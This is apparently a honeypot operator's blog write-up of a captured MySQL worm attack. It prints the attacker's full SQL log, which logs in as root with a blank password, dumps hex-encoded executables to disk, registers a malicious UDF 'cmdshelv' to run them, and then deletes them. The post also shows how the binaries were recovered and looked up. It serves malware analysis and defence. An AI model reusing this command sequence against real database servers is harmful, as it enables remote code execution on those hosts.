I pushed some final mysql fixes for dionaea yesterday, and just had a look on the ore if there was some activity already.
Yes, there was some activity.
Some automaton connected the database 1), and took some efforts to upload 2 files - exactly what I was looking for.
Attack 15134625 at 2011-06-12 11:12:04.471350
15134625 accept tcp 127.0.0.1:3306 61.129.33.77:4287
mysqld
login: 'root':''
3 'drop function cmdshell'
3 'drop function my_udfdoor'
3 'drop function do_system'
3 'use mysql;'
3 'drop table if exists tempMix4;'
3 'create table if not exists tempMix4(data LONGBLOB);'
3 'set @a = concat('',4D5A90000300000004004D5A...);'
3 'INSERT INTO tempMix4 VALUES (@a);'
3 'select data from tempMix4 into DUMPFILE 'C:\\boot1.exe';'
3 'drop table if exists tempMix4;'
3 'use mysql;'
3 'drop table if exists tempMix;'
3 'create table if not exists tempMix(data LONGBLOB);'
3 'set @a = concat('',0x4D5A90000300000004000000FFFF...);'
3 'INSERT INTO tempMix VALUES (@a);'
3 'select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll''
3 'select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll''
3 'select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll''
3 'select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll''
3 'select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll''
3 'select data from tempMix into DUMPFILE 'C:\\amd.dll''
3 'select data from tempMix into DUMPFILE '..\\bin\\amd.dll''
3 'create function cmdshelv returns string soname 'amd.dll';'
3 'create function cmdshelv returns string soname 'amd.dll''
3 'create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll''
3 'create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll''
3 'create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll';'
3 'create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll';'
3 'create function cmdshelv returns string soname 'amd.dll''
3 'select cmdshelv('c:\\boot1.exe')'
3 'select cmdshelv('c:\\boot1.exe');'
3 'select cmdshelv('cmd.exe cmd/c del c:\boot1.exe');'
3 'select cmdshelv('cmd.exe cmd/c del c:\boot1.exe');'
3 'select cmdshelv('cmd.exe cmd/c del c:\boot1.exe')'
3 'select cmdshelv('cmd.exe cmd/c del c:\amd.dll')'
3 'select cmdshelv('cmd.exe cmd/c del C:\WINNT\amd.dll')'
3 'select cmdshelv('cmd.exe cmd/c del C:\WINDOWS\amd.dll')'
3 'drop table if exists tempMix;'
1
The worm creates a table and inserts a blob into this table dumping the table into a local file afterwards. This is done twice, once for each file, “boot1.exe” using the table “tempMix4”, “amd.dll” using the table “tempMix”. Afterwards the function “cmdshelv” is created using the dumped file “amd.dll” and the created function cmdshelv is used to run the second file dumped “boot1.exe”.
To retrieve the files from the record page I copied the string, put it in a txt file, and had python convert it - after figuring the proper end of the string:
>>> a = open('/tmp/boot1.exe.hex') >>> b = a.read() >>> b[-10:-1] "808080);'" >>> b[-10:-3] '808080)' >>> b[-10:-4] '808080' >>> c = bytes.fromhex(b[:-4]) >>> d = open('/tmp/boot1.exe','wb+') >>> d.write(c) 209829 >>> d.close() >>>
The first files (boot1.exe) md5sum 84a9c9797f5884a94f71641c545169bb had no hits on google 2), so I uploaded the file to virustotal 3).
The second file (amd.dll) was known to google 4) and I was curious, so I decided to have a quick look - besides querying virustotal5)
Looking at the exports, there are two exported functions “cmdshelv” and “download”:
The strings even provide a help how to call these functions, so I was done with my quick look.
I was courious if “cmdshelv” was a known pattern, so I asked google, and there was even a hit:
The host featured slightly outdated software:
phpmyadmin even warned of the misconfiguration:
The table tempmix4 still existed:
The function “cmdshelv” was listed as udf:
And there were some ids how not to design a table:
So I really hope this was a honeypot.
Last but not least, this was not my own deployment but some anonymous contributor using logxmpp to the ore who did a good job on updating in time - thanks.
